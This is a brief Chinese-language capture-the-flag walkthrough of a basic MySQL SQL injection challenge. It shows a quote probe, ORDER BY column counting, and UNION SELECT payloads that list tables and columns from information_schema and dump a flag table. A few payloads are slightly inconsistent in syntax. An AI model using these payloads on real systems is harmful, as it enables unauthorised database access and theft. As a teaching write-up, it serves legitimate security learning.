一. 对于这一道sql注入题是一道基础中的基础,但他又是重点中的重点。
1.看题
2.输入查询
3.判断注入点
输入1‘得到如下
could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'1\'\'\' at line 1
4.有注入点,进行注入
1\' order by 1,2,3,4,#(判断有四个字段)
5.暴库
1\' order by 1,2,database(),4#
6.爆表
-1\' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#
7.爆字段
1\' union select 1,group_concat(column_name),2,3 from information_schema.columns where table_name=\'flag\'
8. 查flag
-1\' union select 1,id,flag,4 from flag where id =1#
这里面还有很多的知识点例如group_concat()函数,语句是如何构造的。这些都是你要了解的。